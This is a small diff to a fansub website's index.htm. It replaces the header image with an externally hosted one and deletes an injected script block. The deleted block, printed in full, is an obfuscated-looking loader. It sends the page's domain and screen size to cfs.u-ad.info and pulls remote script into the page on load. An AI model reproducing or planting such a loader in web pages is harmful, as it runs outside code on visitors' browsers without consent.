--- a/index.htm
+++ b/index.htm
@@ -11,7 +11,7 @@ body {background:#52BAD7}
 
 <body>
 <div id="box" class="main">
-<img src="lulung-top.jpg" class="main" border="2"><br><br>
+<img src="http://puu.sh/k1Ho0/1a3c94b97a.jpg" class="main" border="2"><br><br>
 
 <a href="http://lulungsubs.com/shows.htm">SHOWS</a> |
 <a href="http://lulungsubs.com/about.htm">ABOUT</a> |
@@ -27,6 +27,5 @@ body {background:#52BAD7}
 
 <br><br>
 </div>
-<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582Ltpw5OIinlR3bRdDMlqFerpmV%2bsvLpd0gckMfogAfVgdir%2blNlPYW62DaZ8YSoYfnKBQcWpLhP5fQaup4XNozMwtsdMF9QiZ%2bbd7Y9LqoK3Fhk73gMIr9mOi1P3oIQv32dodFR%2fnAEWtqo%2bpeLfui5xYBQttfMGLLGmgklfEnxY%2bzT9n%2fRoEWhWBeZbsQMcZJo4423VzePnmu3IQkaYkIeEmnCPwu8Num9cGurJIoRxRRdqFc0Pzoj%2bbFIEGZrt%2fKqFA%2fZRBmr%2fEke7%2fozO5dUepBjQ0kIwDFGub1gPJZjUFyfohRYeuW4Ds29IkZuaYmrLi8KD%2bWnAVg4SaxexoeefkENDybDDHkO7WZQNwBdtPSkYOHo%2bwsSUQ5W%2fcE8etJexla12ufY4IhvKfnjUA6Y6JjHq4VUuu1IP3VMSmc%2bqh1P%2fhLuU44xAvWlrXypss8sjcrRgFCoAnfXZVCJaZjSDRV8eizAB2XrRK8frIfdk" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script>
 </body>
 </html>
